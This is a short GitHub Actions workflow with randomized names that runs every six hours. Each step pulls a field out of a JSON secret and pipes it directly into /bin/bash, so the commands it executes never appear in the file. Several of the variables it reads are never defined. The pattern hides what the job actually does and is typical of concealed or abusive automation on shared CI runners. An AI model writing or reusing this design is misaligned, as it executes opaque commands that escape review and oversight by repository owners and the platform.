name: tianpoguang1937
on:
  workflow_dispatch:
  schedule:
    - cron: '48 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tianpoguang1937
        env:
          vi3: ${{ secrets.vi3 }}
        run: |
          echo $vi3 | jq -r .wxit074 | /bin/bash
          echo $ru0 | jq -r .de691 | /bin/bash
          echo $qb6 | jq -r .wjrre1990 | /bin/bash
          echo $bqrg500 | jq -r .vku947 | /bin/bash

